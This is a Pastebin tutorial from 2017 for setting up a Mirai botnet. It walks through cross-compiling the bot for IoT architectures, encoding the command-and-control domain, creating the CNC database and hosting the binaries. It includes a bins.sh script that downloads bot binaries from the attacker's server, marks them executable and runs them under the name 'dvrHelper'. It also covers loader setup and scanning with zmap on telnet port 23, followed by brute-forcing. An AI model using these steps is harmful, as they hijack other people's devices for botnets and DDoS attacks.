API tools faq
paste
Advertisement
zfrxnzy

Mirai Botnet Tutorial (With Scanning)

zfrxnzy
Aug 6th, 2017
7,277
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.45 KB | None | 0 0
raw download clone embed print report
  1. So my last miari tut was a piece of shit so I decided to delete it and make an updated version.
  2.  
  3. (1) Connect A Domain To Your Server And Install The Following
  4. apt-get update -y
  5. apt-get upgrade -y
  6. apt-get install gcc electric-fence sudo git apache2 screen tftpd tftp xinetd -y
  7. apt-get install mysql-server mysql-client -y
  8.  
  9. (2) Now We Need To Install Golang From Source (https://pastebin.com/zEj9H9su)
  10. wget https://storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz
  11. sudo tar -xvf go1.8.3.linux-amd64.tar.gz
  12. sudo mv go /usr/local
  13. export GOROOT=/usr/local/go
  14. export GOPATH=$HOME/Projects/Proj1
  15. export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
  16. To see if Go installed correctly type in
  17. go version
  18. if you see go version go1.8.3 linux/amd64
  19. then go installed correctly
  20.  
  21. (3) Time To Cross Compile
  22. mkdir /etc/xcompile
  23. cd /etc/xcompile
  24.  
  25. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
  26. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
  27. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
  28. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
  29. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
  30. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
  31. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
  32. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
  33. wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
  34. wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
  35.  
  36. tar -jxf cross-compiler-armv4l.tar.bz2
  37. tar -jxf cross-compiler-i586.tar.bz2
  38. tar -jxf cross-compiler-i686.tar.bz2
  39. tar -jxf cross-compiler-m68k.tar.bz2
  40. tar -jxf cross-compiler-mips.tar.bz2
  41. tar -jxf cross-compiler-mipsel.tar.bz2
  42. tar -jxf cross-compiler-powerpc.tar.bz2
  43. tar -jxf cross-compiler-sh4.tar.bz2
  44. tar -jxf cross-compiler-sparc.tar.bz2
  45. tar -jxf cross-compiler-armv6l.tar.bz2
  46.  
  47. rm *.tar.bz2
  48. mv cross-compiler-armv4l armv4l
  49. mv cross-compiler-i586 i586
  50. mv cross-compiler-i686 i686
  51. mv cross-compiler-m68k m68k
  52. mv cross-compiler-mips mips
  53. mv cross-compiler-mipsel mipsel
  54. mv cross-compiler-powerpc powerpc
  55. mv cross-compiler-sh4 sh4
  56. mv cross-compiler-sparc sparc
  57. mv cross-compiler-armv6l armv6l
  58.  
  59. (4) Time To Execute The Golang Paths
  60. export PATH=$PATH:/etc/xcompile/armv4l/bin
  61. export PATH=$PATH:/etc/xcompile/armv6l/bin
  62. export PATH=$PATH:/etc/xcompile/i586/bin
  63. export PATH=$PATH:/etc/xcompile/i686/bin
  64. export PATH=$PATH:/etc/xcompile/m68k/bin
  65. export PATH=$PATH:/etc/xcompile/mips/bin
  66. export PATH=$PATH:/etc/xcompile/mipsel/bin
  67. export PATH=$PATH:/etc/xcompile/powerpc/bin
  68. export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
  69. export PATH=$PATH:/etc/xcompile/sh4/bin
  70. export PATH=$PATH:/etc/xcompile/sparc/bin
  71. export PATH=$PATH:/etc/xcompile/armv6l/bin
  72. export PATH=$PATH:/usr/local/go/bin
  73. export GOPATH=$HOME/Documents/go
  74.  
  75. (5) Getting the drivers and stringing domain
  76. go get github.com/go-sql-driver/mysql
  77. go get github.com/mattn/go-shellwords
  78. cd tools
  79. gcc enc.c -o enc -pthread
  80. ./enc string domain.com copy and paste the string and xord number into a file so you dont forget it
  81.  
  82. (6) Linking domain
  83. Go to table.c in /mirai/bot
  84. replace the then get your xords thing then where you see add_entry(TABLE_CNC_DOMAIN you wanna replace the string there
  85. then you wanna take the number 30 and put your xord number there. where you see add_entry(TABLE_SCAN_CB_DOMAIN do the exact same thing for there then exit and save the file
  86. make sure you dont mess up either
  87.  
  88. (7) Setting Up The Database
  89. In mirai/cnc edit the main.go
  90. const DatabaseAddr string = "127.0.0.1:3306"
  91. const DatabaseAddr string = "root"
  92. const DatabaseAddr string = "mysql pass here"
  93. const DatabaseAddr string = "mirai"
  94.  
  95. (8) Set up the database in mysql
  96. mysql -u root -p
  97. then enter password
  98. create database mirai;
  99. use mirai
  100. then enter this
  101. CREATE TABLE `history` (
  102. `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  103. `user_id` int(10) unsigned NOT NULL,
  104. `time_sent` int(10) unsigned NOT NULL,
  105. `duration` int(10) unsigned NOT NULL,
  106. `command` text NOT NULL,
  107. `max_bots` int(11) DEFAULT '-1',
  108. PRIMARY KEY (`id`),
  109. KEY `user_id` (`user_id`)
  110. );
  111.  
  112. CREATE TABLE `users` (
  113. `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  114. `username` varchar(32) NOT NULL,
  115. `password` varchar(32) NOT NULL,
  116. `duration_limit` int(10) unsigned DEFAULT NULL,
  117. `cooldown` int(10) unsigned NOT NULL,
  118. `wrc` int(10) unsigned DEFAULT NULL,
  119. `last_paid` int(10) unsigned NOT NULL,
  120. `max_bots` int(11) DEFAULT '-1',
  121. `admin` int(10) unsigned DEFAULT '0',
  122. `intvl` int(10) unsigned DEFAULT '30',
  123. `api_key` text,
  124. PRIMARY KEY (`id`),
  125. KEY `username` (`username`)
  126. );
  127.  
  128. CREATE TABLE `whitelist` (
  129. `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  130. `prefix` varchar(16) DEFAULT NULL,
  131. `netmask` tinyint(3) unsigned DEFAULT NULL,
  132. PRIMARY KEY (`id`),
  133. KEY `prefix` (`prefix`)
  134. );
  135.  
  136. after that you wanna make logins to who ever you want on the net for ex
  137. INSERT INTO users VALUES (NULL, 'root', 'bushdid911', 0, 0, 0, 0, -1, 1, 30, '');
  138.  
  139. (9) Now go to your mirai folder and run ./build.sh release telnet
  140. then
  141. cd release
  142. mkdir /var/www/html/bins
  143. mv mirai* /var/www/html/bins
  144. screen ./cnc (then press control+a+d)
  145.  
  146. (10) Setting Mirai bins.sh up
  147. go to /var/www/html/bins
  148. then do
  149. nano bins.sh
  150. then edit this then paste it into the bins.sh nano window
  151. #!/bin/sh
  152.  
  153. # Edit
  154. WEBSERVER="ServerIP:80"
  155. # Stop editing now
  156.  
  157.  
  158. BINARIES="mirai.arm4n mirai.arm5n mirai.arm6n mirai.i586 mirai.i686 mirai.m68k mirai.mips mirai.mpsl mirai.ppc mirai.sh4 mirai.spc mirai.x86"
  159.  
  160. for Binary in $BINARIES; do
  161. wget http://$WEBSERVER/$Binary -O dvrHelper
  162. chmod 777 dvrHelper
  163. ./dvrHelper
  164. done
  165.  
  166. Control+o then press y
  167. then control + x
  168.  
  169. (11) Setting echoloader bins up
  170. cd /root/dlr/
  171. then do nano main.c
  172. edit the ip 127,0,0,1 to your server ip with commas (ex 1,3,3,7)
  173. then save it
  174. then do
  175. sh build.sh
  176. then do
  177. cp dlr.* /root/loader/bins/
  178. then do cd
  179. then do cd loader
  180. then cd main.c
  181. edit all the ips in there with your servers ip
  182. then go back into your loader directory and run
  183. sh build.sh
  184. congratulations you now setup echoloader
  185. to scan you want to either
  186. zmap -p23 -otelnet.txt then brute it
  187. or if you already have a list do
  188. cat list.txt | ./loader
  189.  
  190. Tutorial By Frxnzy
  191. any problems?
  192. hmu on skype: zfrxnzy
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!